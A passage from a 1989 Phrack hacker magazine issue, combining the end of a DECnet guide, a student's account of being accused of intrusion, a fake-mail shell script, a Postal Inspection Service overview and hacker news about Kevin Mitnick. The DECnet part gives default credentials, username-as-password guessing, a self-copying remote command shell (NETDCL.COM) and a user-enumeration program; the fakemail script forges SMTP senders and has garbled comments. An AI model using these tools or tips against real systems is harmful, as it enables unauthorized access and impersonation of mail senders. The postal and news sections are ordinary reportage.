them, so that's no great loss.  Guess what passwords many accounts have?  Sure,
just try the username.  It's really amazing how ignorant users can be.  Of
course this is a problem of group-accounts, that many users have access to and
must know the password.  Nevertheless, the hole is there.

The real hacker, once he has logged in on such an account surely finds ways to
gain system privilege.  This requires in-depth knowledge of the Kernel of VMS
and is another story I won't deal with.


What is DECNET?
~~~~~~~~~~~~~~~
DECNET is the means, by which computers from Digital Equipment Corporation
(DEC) can be connected to each other.  Each computer in this network has an
address which is normally given by x.y where x is the area number (an integer)
and y is the node number in this area which ranges from 1 to 1023.  To access
DECNET nodes, one specifies just one number, which can be computed from x and y
by the following formula:

   nodenumber = x * 1024 + y

Often nodes, especially local nodes (having the same area number as your
current node) have names assigned to them so they can be memorized more easily.


Interesting DECNET Commands
~~~~~~~~~~~~~~~~~~~~~~~~~~~
To get a (first) list of available DECNET nodes, try the command

   $ SHOW NET

The $ (as in the following examples) is the default prompt of VMS and should
not be entered.  This Command will give you a list of (hopefully) reachable
nodes.  All lines of the output contain the network address in the form x.y and
normally a name which this node is known by.

Your current node is mentioned in the first line in "VAX/VMS network status for
local node X.Y Name".  In most cases you will then just see local nodes listed
and a line saying "The next hop to the nearest area router is node XX.YY".
This node contains more information about the DECNET than the node you are
currently on.  If you have an account on the specified node, log on there and
try again.  If not, well, play with the local nodes listed and look at the
command NCP shown later.

Now, what can you do with those nodes that were mentioned in the output?
First command is

    $ SET HOST <node>

Where <node> is either a nodename or a nodenumber (see above).  Thus, if SDIVAX
was listed in the SHOW NET list as 42.13, then you may try both SET HOST SDIVAX
or SET HOST 43021 (42*1024+13 = 43021).  Probably you'll get that ugly
Username: prompt.  You're on your own then.

Second thing you can do with DECNET is email.  On VMS the MAIL program can send
mail to other users.  If you and your friend both have accounts on the same
DECNET, you can send him mail if you know his nodename or nodenumber by
specifying SDIVAX::FREDDY or 43021::FREDDY.

Then there is PHONE.  This is a utility to talk to another (or several) user(s)
on a DECNET.  If you want to call Freddy, just type PHONE SDIVAX::FREDDY.  If
he is logged in, his terminal will ring and if he answers his phone (with PHONE
ANSWER) you may chat with him.  PHONE has another nice feature built in:  You
may ask for a list of active users on a remote name by %DIR SDIVAX.  See the
online help on PHONE for further details.

The next really mighty DECNET facility is remote file access.  Valid filenames
in VMS consist of the components node, disk, directory and filename.  An
example for a valid filename is SDIVAX::DISK$2:[NASA.SECRET]SDI.DOC where some
components may be omitted and default values are used instead.

File names including the node specification may be used in nearly all VMS
commands examples being DIR, TYPE and COPY.  Access to the specified file is
granted, if the protection of the file allows access by world, or if the owner
of the file is the user DECNET.  This pseudo userid is available on every VAX
and has the password DECNET.  Access to that account is limited to network
processing so you can't just log in with Username=DECNET, password=DECNET.  By
default a special directory owned by the User DECNET exists on each node.  This
directory can be accessed by just specifying the nodename without any disk or
directory information, as in

    $ DIR SDIVAX::

If users played too much with this feature, the directory may be protected or
otherwise disabled.

The last feature described here is the remote command processing facility.  If
you try to open a file with the specification

    $ SDIVAX::"task=foo.com"

Instead of opening the DCL procedure, foo.com will be executed.  To make use of
this feature easily, programs have been written to interactively communicate
with a remote host.  The command procedure NETDCL.COM does this task and is
contained in the Appendix A (seen later in this file.  Look at this
DCL-Procedure to learn more about DECNET features.


The Key To Universal Knowledge
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
There is a pearl under the programs on a VAX.  It's called NCP and will give
readily information about the whole DECNET.  You start this program either by
MCR NCP or by doing a SET DEF SYS$SYSTEM and RUN NCP.  Use the on-line Help
provided in NCP (which means Network Control Program) to learn more.

    NCP> SHOW KNOWN NODES

Provides a list of all nodes known on your current node, including the names
you may use as node specifications.  But there is more:  You may connect to
another node's database and get a list of nodes which are known at the remote
node with

    NCP> SET EXEC SDIVAX

And then again the SHOW KNOWN NODES command.  This feature should provide you
with a nearly infinite list of node names and node numbers.


Conclusion
~~~~~~~~~~
There are many nice features available under DECNET.  Probably I don't know
all, but I hope this article showed you the mighty tools available on VMS to
make network life easier.


WARNING:  The author has had bad experiences with some node administrators,
          who didn't like their machines being contacted over DECNET.  Yes,
          that's the drawback, each DECNET activity is written to a protocol
          file that is printed and deleted every month.  So you should be
          careful in using DECNET.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

APPENDIX A:

The Procedure NETDCL.COM, sometimes called TELL.COM, NET.COM
-----------------------
$ IF f$mode() .EQS. "NETWORK" THEN GOTO network
$ IF p1 .EQS. "" THEN READ/PROMPT="_Node: " sys$command p1
$ nodespec = p1 - "::"
$ nodename = f$extract(0,f$locate("""",nodespec),nodespec)
$! include the following line for "hard cases"
$! nodespec = nodespec+"""decnet decnet"""
$ ON WARNING THEN CONTINUE
$ CLOSE/ERR=open_server dcl_server
$open_server:
$ OPEN/READ/WRITE dcl_server 'nodespec'::"TASK=NETDCL"/ERROR=open_failure
$ ON WARNING THEN GOTO exit
$flush_output:
$ READ dcl_server record
$ IF record .EQS. "SEND_ME_A_COMMAND" -
  THEN GOTO send_command
$ WRITE sys$output record
$ GOTO flush_output
$send_command:
$ IF p2 .NES. "" THEN GOTO single_command
$ READ sys$command record /PROMPT="''nodename'> " /END=exit
$ record  := 'record
$ IF record .EQS. "EXIT" THEN GOTO exit
$ WRITE dcl_server record
$ GOTO flush_output
$single_command:
$ command := 'p2' 'p3' 'p4' 'p5' 'p6' 'p7' 'p8'
$ WRITE dcl_server command
$single_flush:
$ READ dcl_server record
$ IF record .EQS. "SEND_ME_A_COMMAND"-
$ THEN GOTO exit
$ WRITE sys$output record
$ GOTO single_flush
$open_failure:
$ ON WARNING THEN EXIT
$ COPY/LOG Netdcl.Com 'nodespec'::
$ WAIT 0:0:1
$ OPEN/READ/WRITE dcl_server 'nodespec'::"TASK=NETDCL"
$ ON WARNING THEN GOTO exit
$ GOTO flush_output
$exit:
$ CLOSE dcl_server
$ EXIT
$network:
$ OPEN/READ/WRITE dcl_link sys$net
$ SET NOON
$ dcl_verify = 'f$verify(0)'
$ DEFINE sys$output dcl_link:
$server_loop:
$ WRITE dcl_link "SEND_ME_A_COMMAND"
$ READ dcl_link dcl_string /END_OF_FILE=server_exit /ERROR=server_exit
$ 'dcl_string'
$  GOTO server_loop
$server_exit:
$ IF dcl_verify THEN set verify
$ CLOSE dcl_link
$ DEASSIGN sys$output
$ EXIT
-----------------------

APPENDIX B

ALLUSER.PAS - Show all registered users
-----------------------
{
* alluser.pas - get names of all users
* by Deep, 1989
* This program is freely redistributable as long no modifications are made
* DISCLAIMER: I take no responsibility for any use or abuse of this
*             program.  It is given for informational purpose only.
*
* program history:
* 04-May-89   started
* 02-Jun-89   clean up of code
}
[inherit ('sys$library:starlet.pen')]
program alluser(input,output);

  type $word      = [word] 0..65535;
       $byte      = [byte] 0..255;
       $quadword  = record
                      lo,hi : unsigned;
                    end;
       $uquad  = record
                      lo,hi : unsigned;
                    end;
var
  id: unsigned;
  status, status2: integer;
  length: $WORD;
  attrib,context,context2,context3: unsigned;
  ident, ident2: unsigned;
  name: varying [512] of char;
  holder: $uquad;

begin

writeln('Alluser - use at your own risk!');
status := SS$_NORMAL;
{ id = -1 selects next identifier }
id := -1;
context := 0;
while (status <> SS$_NOSUCHID) do
   begin
   { find next identifier }
   status := $idtoasc(id,name.length,name.body,ident,attrib,context);
   if (status <> SS$_NOSUCHID) then begin
      write(pad(name,' ',16));
      if (ident div (65536*32768) > 0) then
         { it's a rights-list, so print the hex-value of the identifier }
         begin
         writeln(oct(ident,12));
         context2 := 0;
         context3 := 0;
         { find all holders of this right }
         repeat
            holder := zero;
            status2 := $find_holder(ident,holder,attrib,context2);
            if (holder.lo <> 0) then begin
                ident2 := ident;
                { get UIC and username }
                status := $idtoasc(holder.lo,name.length,name.body,ident2
                    ,attrib,context3);
                write('                ',pad(name,' ',16));
                writeln('[',oct(holder.lo div 65536,3),','
                    ,oct(holder.lo mod 65536,3),']');
               end;
         until (holder.lo = 0);
         end
      else
         { it's a UIC, so translate to [grp,user] }
         begin
         writeln('[',oct(ident div 65536,3),',',oct(ident mod 65536,3),']');
         end;
      end;
   end;
end.
-----------------------

This article has been brought to you by Deep Thought of West Germany.  If you
liked this article, grant me access if I once drop in your BBS!
_______________________________________________________________________________




--------------------------------------------------------------------------------


                                ==Phrack Inc.==

                     Volume Three, Issue 27, File 7 of 12

               <:><:><:><:><:><:><:><:><:><:><:><:><:><:><:><:>
               <:>                                          <:>
               <:>          The Making Of A Hacker          <:>
               <:>                                          <:>
               <:>        by Framstag of West Germany       <:>
               <:>                                          <:>
               <:>                June 2, 1989              <:>
               <:>                                          <:>
               <:><:><:><:><:><:><:><:><:><:><:><:><:><:><:><:>


Prologue For None VMS Users
~~~~~~~~~~~~~~~~~~~~~~~~~~~
     DECnet is the network for DEC machines, in most cases you can say VAXes.
DECnet allows you to do:   - e-mail
                           - file transfer
                           - remote login
                           - remote command
                           - remote job entry
                           - PHONE
     PHONE is an interactive communication between users and is equal to TALK
on UNIX or a "deluxe"-CHAT on VM/CMS.

     BELWUE, the university network of the state Baden-Wuerttemberg in
West Germany contains (besides other networks) a DECnet with about 400 VAXes.
On every VAX there is standard-account called DECNET with pw:= DECNET, which is
not reachable via remote login.  This account is provided for several
DECnet-Utilities and as a pseudo-guest-account.  The DECNET-account has very
restricted privileges:  You cannot edit a file or make another remote login.

    The HELP-menu is equipped by the system and is similar to the MAN command
on UNIX.

    More information on DECnet can be found in "Looking Around In DECnet" by
Deep Thought in this very issue of Phrack Inc.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

     Here, at the University of Ulm, we have an *incredibly* ignorant computer
center staff, with an even bigger lack of system-literature (besides the 80 kg
of VAX/VMS-manuals).  The active may search for information by himself, which
is over the level of "run," "FORTRAN," or "logout."  My good luck that I have
other accounts in the BELWUE-DECnet, where more information is offered for the
users.  I am a regular student in Ulm and all my accounts are completely legal
and corresponding to the German laws.  I don't call myself a "hacker," I feel
more like a "user" (...it's more a defining-problem).

     In the HELP-menu in a host in Tuebingen I found the file netdcl.com and
the corresponding explanation, which sends commands to the DECNET-Account of
other VAXes and executes them there (remote command).  The explanation in the
HELP-menu was idiot-proof -- therefore for me, too :-)

     With the command "$ mcr ncp show known nodes" you can obtain a list of all
netwide active VAXes, as is generally known, and so I pinged all these VAXes to
look for more information for a knowledge-thirsty user.  With "help", "dir" and
other similar commands I look around on those DECnet accounts, always watching
for topics related to the BELWUE-network.  It's a pity, that 2/3 of all VAXes
have locked the DECNET-Account for NETDCL.COM.  Their system managers are
probably afraid of unauthorized access, but I cannot imagine how there could be
such an unauthorized access, because you cannot log on this account -- no
chance for trojan horses, etc.

     Some system managers called me back after I visited their VAX to chat with
me about the network and asked me if they could help me in any way. One sysop
from Stuttgart even sent me a version of NETDCL.COM for the ULTRIX operation
system.

     Then, after a month, the  H O R R O R  came over me in shape of a the
following mail:

--- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ---
From:   TUEBINGEN::SYSTEM       31-MAY-1989 15:31:11.38
To:     FRAMSTAG
CC:
Subj:   don't make any crap, or you'll be kicked out!

From:   ITTGPX::SYSTEM       29-MAY-1989 16:46
To:     TUEBINGEN::SYSTEM
Subj:   System-breaking-in 01-May-1989

To the system manager of the Computer TUEBINGEN,

On May 1st 1989 we had a System-breaking-in in our DECNET-account, which
started from your machine.  By help of our accounting we ascertained your user
FRAMSTAG to have emulated an interactive log-on on our backbone-node and on
every machine of our VAX-cluster with the "trojan horse" NETDCL.COM.  Give us
this user's name and address and dear up the occurrence completely.  We point
out that the user is punishable.  In case of repetition we would be forced to
take corresponding measures.  We will check whether our system got injured.  If
not, this time we will disregard any measure.  Inform us via DECnet about your
investigation results -- we are attainable by the nodenumber 1084::system

Dipl.-Ing. Michael Hager
--- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ---

     My system manager threatened me with the deleting of my account, if I
would not immediately enlighten the affair.  *Gulp*!
     I was conscious about my innocence, but how to tell it to the others?  I
explained, step by step, everything to my system manager.  He then understood
after a while, but the criminal procedure still hovered over me... so, I took
quickly to my keyboard, to compose file of explanations and to send it to that
angry system manager in Stuttgart (node 1084 is an institute there).  But no
way out:  He had run out of disk quota and my explanation-mail sailed into the
nirwana:

--- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ---
$ mail explanation
  To:   1084::system
%MAIL-E, error sending to user SYSTEM at 1084
%MAIL-E-OPENOUT, error opening SYS$SYSROOT:[SYSMGR]MAIL$00040092594FD194.MAI;
as output
-RMS-E-CRE, ACP file create failed
-SYSTEM-F-EXDISKQUOTA, disk quota exceeded
--- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ---

     Also the attempt of a connection with the PHONE-facilty failed:  In his
borderless hacker-paranoia, he cut off his PHONE... and nowhere is a list with
the REAL-addresses of the virtual DECnet-addresses available (to prevent
hacking).  Now I stood there with the brand "DANGEROUS HACKER!" and I had no
chance to vindicate myself.  I poured out my troubles to an acquaintance of
mine, who is a sysop in the computer-center in Freiburg.  He asked other sysops
and managers thru the whole BELWUE-network until someone gave him a telephone
number after a few days -- and that was the right one!

     I phoned to this Hager and told him what I had done with his
DECnet-account and also what NOT.  I wanted to know which crime I had
committed.  He promptly cancelled all of his reproaches, but he did not excuse
his defamous incriminations.  I entreated him to inform my system manager in
Tuebingen that I have done nothing illegal and to stop him from erasing my
account.  This happens already to a fellow student of mine (in this case, Hager
was also guilty).  He promised me that he would officially cancel his
reproaches.

     After over a week this doesn't happen (I'm allowed to use my account
further on).  In return for it, I received a new mail from Hager on another
account of mine:

--- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ---
From:   1084::HAGER         1-JUN-1989 12:51
To:     50180::STUD_11
Subj:   System-breaking-in

On June 1st 1989 you have committed a system-breaking-in on at least one of our
VAXes.  We were able to register this occurrence.  We would be forced to take
further measure if you did not dear up the occurrence completely until June
6th.

Of course the expenses involved would be imposed on you.  Hence enlightenment
must be in your own interest.

We are attainable via DECnet-mail with the address 1084::HAGER or via following
address:

Institut fuer Technische Thermodynamik und Thermische Verfahrenstechnik
Dipl.-Ing. M. Hager    Tel.: 0711/685-6109
Dipl.-Ing. M. Mrzyglod Tel.: 0711/685-3398
Pfaffenwaldring 9/10-1
7000 Stuttgart-80

 M. Hager
 M. Mrzyglod
--- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ---

This was the reaction of my attempt: "$ PHONE 1084::SYSTEM".  I have not
answered to this mail.  I AM SICK OF IT!


                                   Framstag
                          ([email protected])

         With Special Thanks For Translation Assistance To Schrulli B.
_______________________________________________________________________________


--------------------------------------------------------------------------------


                                ==Phrack Inc.==

                     Volume Three, Issue 27, File 8 of 12

        <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
        <><><><>                                              <><><><>
        <><><>             Sending Fake Mail In Unix            <><><>
        <><>                                                      <><>
        <>                     by Dark OverLord                     <>
        <><>                                                      <><>
        <><><>                   May 26, 1989                   <><><>
        <><><><>                                              <><><><>
        <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>


Here is a shell script that can be use to send fakemail from any Unix system.
Have fun and stay out of trouble.


-Dark Overlord

        -=-=-=-=-=-=-=-=-=-=-=-=-=  Cut here -=-=-=-=-=-=-=-=-=-=-=-=-=
! /bin/sh
#Mfakemail - A shell script to send fakemail.
#M##M#Met up the path.
PATH=/usr/ucb:/bin:$HOME/Bin
#Marse the command line
case $ in
0)echo "USAGE: user@host [ from@somewhere ] [ mailer_host ]" >& 2
exit 1
;;
1)mailto=$1
from="person@campus"
mailerhost=localhost
;;
2)mailto=$1
from=$2
mailerhost=localhost
;;
3)mailto=$1
from=$2
mailerhost=$3
;;
*)echo "USAGE: user@host [ from@somewhere ] [ mailer_host" >& 2
exit 1
;;
esac
#Mreate a header for sendmail
cat <<E!O!F!> /tmp/cli$$
helo $mailerhost
mail from:$from<$from>
rcpt to: $mailto <$mailto>
data
From: $from
To: $mailto
Subject:
Status: RO


E!O!F!
#Mdit the mailer
vi /tmp/cli$$
#Mdd a ending for the mailer
cat <<E!O!F!>> /tmp/cli$$
.
quit
E!O!F!
#Monnect to the remote host's sendmail daemon
telnet $mailerhost smtp < /tmp/cli$$
#Mlean up time
/bin/rm -f /tmp/cli$$
_______________________________________________________________________________


--------------------------------------------------------------------------------


                                ==Phrack Inc.==

                     Volume Three, Issue 27, File 9 of 12


                   +======================================+

                         The Postal Inspection Service

                 (C) UNITED STATES POSTAL SERVICE (U.S. MAIL)

                               Brought to you by

                                   Vendetta

                                 May 10, 1989

                   +======================================+


Protecting The U.S. Mails
~~~~~~~~~~~~~~~~~~~~~~~~~
The protection of the U.S. Mail and the mail system is the responsibility of
the Postal Inspection Service.  As the law enforcement and audit arm of the
U.S. Postal Service, the Inspection Service is a highly specialized,
professional organization performing investigative, law enforcement, and audit
functions essential to a stable and sound postal system.

As our country's oldest federal law enforcement agency, the Inspection Service
has jurisdiction in all criminal matters infringing on the integrity and
security of the mail, and the safety of all postal valuables, property, and
personnel.

Since the beginning of a postal system in this country, criminal and
administrative problems of the Postal Service have been interwoven.  By
detecting and investigating crimes against the mail and postal revenue,
establishing safe and efficient postal systems, protecting all postal
properties, assuring that the postal system is not criminally misused to the
detriment of the public, the Inspection Service plays an integral part in
maintaining effective operations in the Postal Service.

The agency's activities make a vital contribution to the protection of the
nation's economy.  Security and enforcement functions of the Inspection Service
provide assurance to American business for the safe exchange of funds and
securities through the U.S. Mail, and to postal customers of the sanctity of
the seal in transmitting correspondence and messages to all parts of the world.
Audits ensure stability to financial operations, help control costs, and
promote increased efficiency in our Postal Service.


Postal Inspectors
~~~~~~~~~~~~~~~~~
Postal Inspectors are the fact finding and investigative agents of the U.S.
Postal Service.  Today nearly two-thirds of their time is spent in
investigating and solving postal related crimes.  Possessing statutory power of
arrest, they apprehend violators of the law and work closely with U.S.
Attorneys in prosecuting cases in court.  Their work also includes crime
prevention, the audit of postal operations, investigation of accidents and a
wide variety of other service and audit matters.

The work of a Postal Inspector requires total dedication and a willingness to
work long hours.  Investigations of postal crimes which often entail interstate
or international coordination, and the responsibility to restore mail service
following catastrophes such as floods, fire, and airplane wrecks, are
time-consuming and can be hazardous.

There are approximately 1,900 Postal Inspectors stationed in the United States
and Puerto Rico.  All trainees undergo an eleven-week basic training course
involving use of firearms, defensive tactics, legal matters, search and
seizure, arrest techniques, court procedures, postal operations, audit
functions, and a detailed study of the federal laws in which the Inspection
Service has jurisdiction.  Classes are conducted at the Inspection Service
training center in Potomac, Maryland.

Refresher courses keep Inspectors informed of current court decisions, laws,
and legal procedures.  Additional specialized courses are continually held to
equip the Service with expertly trained personnel.

All applicants for the position of Postal Inspector must successfully complete
the following steps; entry examination; a comprehensive background
investigation including ma medical examination; the candidate assessment center
review; and all phases of the basic training course.


Inspection Service Activity
~~~~~~~~~~~~~~~~~~~~~~~~~~~
         Criminal investigations and postal crime prevention represent
             the greatest portion of Inspection Service activity.

Postal Inspectors investigate violations of all postal laws and other related
criminal violations.  Crimes within the purview of postal investigations
include mail fraud, the illegal transmission of controlled substances through
the U.S. Mail, the mailing of child pornography, thefts of mails or postal
valuables, assaults on postal employees, bombs sent through the mails or
directed against postal properties, and the mailing of matter containing
poison, unauthorized concealable firearms, and harmful or prohibited articles.

Five crime laboratories located throughout the country assist Inspectors in
analyzing evidentiary material needed for identifying and tracing criminal
suspects and in providing expert testimony for cases brought to trial.

The objectives of postal crime prevention are to anticipate, identify, and
analyze those areas of greatest crime risk potentially affecting employees,
funds, property, and postal customers.  Postal Inspectors then take action to
remove or reduce that risk and maintain the integrity of the Postal Service.

                "The Postal Inspection Service is responsible
                for the internal audit of the Postal Service."

Postal Inspectors provide management with independent audits and investigations
of all postal activities as a part of the Postal Service's internal control
system.

Audits of installations and systems protect the assets of the Service, improve
its financial management system, assist in the resolution of customer
complaints, investigate matters of Congressional interests, and identify
specific improvements for better customer service and more economical
operations.

Financial audits provide an independent check on the adequacy and effectiveness
of control systems; verify the existence of assets and ensure the proper
safeguards are maintained.  Operations audits are conducted to assist postal
management in the operation of an efficient, and reliable Postal Service.


Security Force
~~~~~~~~~~~~~~
Postal Police Officers provide protection to mail, postal valuables, postal
employees, facilities, and vehicles of the Postal Service.  As part of the law
enforcement team, they assist Postal Inspectors in the enforcement of certain
postal laws and regulations on postal premises and provide mobile response
unites in emergency situations involving the Postal Service.

Equipped with portable radios and alerted by closed circuit television they
provide perimeter security to major postal facilities and other buildings
operated by the Postal Service.  Their presence in postal installations
throughout the country is a deterrent to postal crimes and an aid to employee
morale.

Postal Police Officers also are used to escort high value mail while in transit
between postal units and at airports.

Experience in military or civil law enforcement, industrial security, or
similar occupations is an asset for positions in the Security Force.  All
appointees undergo a four-week training course conducted at the Inspection
Service's training center.


Coordination With Other Agencies
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The Inspection Service extends full cooperation to all local and federal
investigative and prosecutive authorities in law enforcement matters to ensure
greater protection to the public.  Postal Inspectors participate in the
Department of Justice national strike force teams aimed at curtailing
widespread criminal acts of an organized nature.  Postal Inspectors also work
closely with the External Auditors in providing support to the certification of
the Postal Service's financial statements.


Conviction Rate
~~~~~~~~~~~~~~~
The Inspection Service maintains a consistently high conviction rate each year
of approximately 98% of cases brought to trial, a rate not exceeded by any
other federal law enforcement agency.


Jurisdiction, Postal Laws, and Protection
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The Inspection Service exercises investigative jurisdiction over approximately
85 postal-related statues.  These can be grouped in two categories:  Criminal
acts against the mails, postal facilities, or postal personnel; and criminal
misuse of the postal system.


MAIL FRAUD

All criminal activity involving use of the U.S. Mail with intent to defraud
comes under the jurisdiction of the Postal Inspection Service.  The Mail Fraud
Law is the oldest consumer protection law in the United States and is one of
the most effective prosecutive tool in fighting white collar and organized
crime.  Millions of dollars are lost each year through mail fraud which cheats
not only the poor and the elderly, but businessmen and the consumer as well.
Prevalent schemes include insurance, banking, false billings; land and
advance-fee selling swindles; franchise schemes; work-at-home and fraudulent
diploma schemes; charity schemes; promotions of fake health cures, beauty
devices, fast-working diets, and sex stimulants; chain letters, lotteries, and
solicitations for the sale of advertising specialty items.

While Postal Inspectors have no statutory authority to act as intermediaries in
the settlement of unsatisfactory financial or property transactions conducted
through the mails, their investigations frequently result in the discontinuance
of fraudulent or borderline operations.  Administrative mail-stop orders may be
issued to prevent continuing public loss while sufficient evidence is being
developed for criminal prosecutive action in the courts, or in cases where
false representations, but not necessarily fraudulent intent, can be proven.
The Inspection Service has a leading role in consumer protection through the
implementation of educational programs designed to prevent mail fraud schemes
from developing, and through its efforts to resolve complaints relating to
consumer/vendor misunderstandings or poor business practices.


ORGANIZED CRIME

Investigations by Postal Inspectors in organized crime matters most frequently
relate to cases involving theft and fencing of large amounts of stamp stock and
securities by organized post office burglary rings; insurance and investment
frauds; and planned bankruptcies and schemes aimed at looting company assets.
The Organized Crime Control Act of 1970 specifically includes violation of the
Mail Fraud Statue as "racketeering activity."  Postal Inspectors are assigned
to the Justice Department Organized Crime Strike Forces which operate at various
points throughout the country.


MAIL THEFT/BURGLARY/ROBBERY

Investigation of mail theft offenses are a large part of the Inspection
Service's responsibilities and most commonly involve stolen checks, food
coupons, or other negotiable securities.  Primary attention is directed at
major gangs, sophisticated fencing operations, large scale thefts, and the
implementation of preventive programs.

Burglaries of post offices range from vandalism to high level burglary rings
and fencing operations involving organized crime activity.

Armed robberies endanger the lives of postal employees and the public and,
therefore, are priority investigations.  The targets of these crimes usually
are postal facilities, vehicles transporting mail, and individual employees,
primarily letter carriers.


DRUGS

Illegal trafficking in drugs, narcotics, and other controlled substances
through the mail is investigated in conjunction with other federal and state
law enforcement agencies.


PORNOGRAPHY

The Inspection Service investigates violations of the Postal Obscenity Statue
enacted in 1865 which prohibits the sending of obscene materials through the
U.S. Mail.  This includes the investigation of child pornography offenses
involving the sexual abuse of exploitation of children based on laws passed in
1977 and 1984.


BOMBS

Investigations of incidents of threats involving bombs and incendiary devices
sent through the mails or directed at postal properties or functions are within
the jurisdiction of the Inspection Service.


EXTORTION

The Inspection Service has investigative responsibility in incidents involving
use of the mails to extort money or property by threat of injury to person's
reputation or by accusing a person of a crime.


OTHER PROHIBITED MAILINGS

The mailing of poisons or other harmful matter prohibited by law is
investigated by Postal Inspectors.


Assistance From The Public
~~~~~~~~~~~~~~~~~~~~~~~~~~
In most cases, the Inspection Service must rely on the watchfulness and
alertness of mail recipients to inform them of possible criminal or harmful
activity involving the use of the mails.  Any suspected violations of postal
laws or misuse of the mails should be reported to the local Postmaster for
referral to a Postal Inspector.  Prompt action on the part of postal customers
and Postal Inspectors is essential in the interest of crime prevention and
detection.
_______________________________________________________________________________


--------------------------------------------------------------------------------


                                ==Phrack Inc.==

                     Volume Three, Issue 27, File 10 of 12

            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
            PWN                                                 PWN
            PWN        P h r a c k   W o r l d   N e w s        PWN
            PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
            PWN               Issue XXVII/Part 1                PWN
            PWN                                                 PWN
            PWN                  June 20, 1989                  PWN
            PWN                                                 PWN
            PWN          Created, Written, and Edited           PWN
            PWN               by Knight Lightning               PWN
            PWN                                                 PWN
            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN


                 Welcome to Issue XXVII of Phrack World News!

This issue features articles on SouthernNet's hacker scam, the Florida
probation sex incident, bulletin boards in Argentina, fax attacks, computer
security, other hacking occurrences, as well as more articles and new
information about Kevin David Mitnick (aka Condor), Robert Tappan Morris, Karl
Koch (Hagbard Celine, one of Clifford Stoll's "Wily Hackers"), TRW and Social
Security Administration, the National Crime Information (NCIC) "Super
Database," and many other fun stories.

Because of our temporary exile from Bitnet, this will be the last regular issue
of Phrack World News until next Fall.  Next issue expect to see the full
write-up on the details and fun events of SummerCon '89.  It is only two days
away as of this writing (it kinda begins on Thursday evening for some of us)
and it looks to be the best SummerCon ever!

A very special thanks goes to Delta Master, Hatchet Molly, and The Mad Hacker
who all assisted with this issue's PWN by submitting articles.  Hatchet Molly
will be serving as a collection agent for Phrack Inc. during the summer.  Be
sure to forward any news articles to him that seem relevant to PWN and he will
get them to me (eventually).  He can be reached on the wide area networks at;

                                (Hatchet Molly)

                              [email protected]
                      TK0GRM2%[email protected]

One other thing to mention here is a special hello to one of our government
readers... Peter Edmond Yee of NASA's Ames Research Center.  He had recently
remarked that he "had access to Phrack!"  I wonder if he thought that Phrack
Inc. was top secret or hard to get?  Still if he wanted it that badly, Taran
King and I thought, "Why not make it easier on him and just send it to his
network address?"  We did :-)))

:Knight Lightning


        "The Real Future Is Behind You... And It's Only The Beginning!"
_______________________________________________________________________________

Mitnick Plea Bargain Rejected By Judge As Too Lenient            April 25, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Excerpts from Kim Murphy (Los Angeles Times)

             "Mr. Mitnick, you have been engaging in this conduct
             for too long, and no one has actually punished you.
             This is the last time you are going to do this."

Reportedly U.S. District Judge Mariana Pfaelzer unexpectedly rejected the plea
bargain of Kevin Mitnick, the hacker once called "as dangerous with a keyboard
as a bank robber with a gun."  Pfaelzer declared that Mitnick deserves more
time behind bars.

As reported in recent issues of Phrack World News, "Mitnick pleaded guilty to
one count of computer fraud and one count of possessing unauthorized
long-distance telephone codes... Mitnick faces one year in prison.  Under a
plea agreement with the government, he must also submit to three years'
supervision by probation officers after his release from prison."

On April 24, 1989 Judge Pfaelzer said, "Mr. Mitnick, you have been engaging in
this conduct for too long, and no one has actually punished you.  This is the
last time you are going to do this."  She said a confidential pre-sentence
report recommended that she exceed even the 18-month maximum prison term called
for under mandatory new federal sentencing guidelines.  The judge's action
voids Mitnick's guilty plea.

Both prosecuting and defense attorneys were surprised.  Mitnick's attorney said
he did not know whether his client would agree to a guilty plea carrying a
longer prison term.  This could make it harder to bring charges against
Mitnick's alleged associates.  If Mitnick is brought to trial, testimony from
at least one of his associates would be required to convict him, and they would
not appear as witnesses without receiving immunity from prosecution.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Computer Hacker Working On Another Plea Bargain                     May 6, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Excerpts from the Los Angeles Herald Examiner

Attorneys said yesterday they are negotiating a second plea bargain for
computer hacker Kevin Mitnick, whose first offer to plead guilty was scuttled
by a judge because it called for too little time in prison.

Mitnick, 25, of Panorama City, California offered in March to serve one year in
prison and to plead guilty to computer fraud and possessing unauthorized
long-distance telephone codes.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Mitnick Update                                                     May 10, 1989
~~~~~~~~~~~~~~
Excerpts taken from the Los Angeles Times

When last we heard about Kevin Mitnick, the hacker once called "as dangerous
with a keyboard as a bank robber with a gun," the judge, Judge Mariana
Pfaelzer, had rejected a plea bargain as too lenient, saying Mitnick deserved
more than the agreed one year of jail time [see above articles].

According to more recent information, Mitnick has now reached a new agreement,
with no agreed-upon prison sentence.  He pleaded guilty to stealing a DEC
security program and illegal possession of 16 long-distance telephone codes
belonging to MCI Telecommunications Corp.  The two charges carry a maximum of
15 years and a $500,000 fine.  The government agreed to lift telephone
restrictions placed on Mitnick since he was jailed in December, 1988.

At DEC's request, Mitnick will help the firm identify and fix holes in its
security software to protect itself from other hackers.  He will also cooperate
in the government's probe of Leonard DiCicco, a fellow hacker.  (DiCicco is the
"friend" who turned Mitnick in.)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

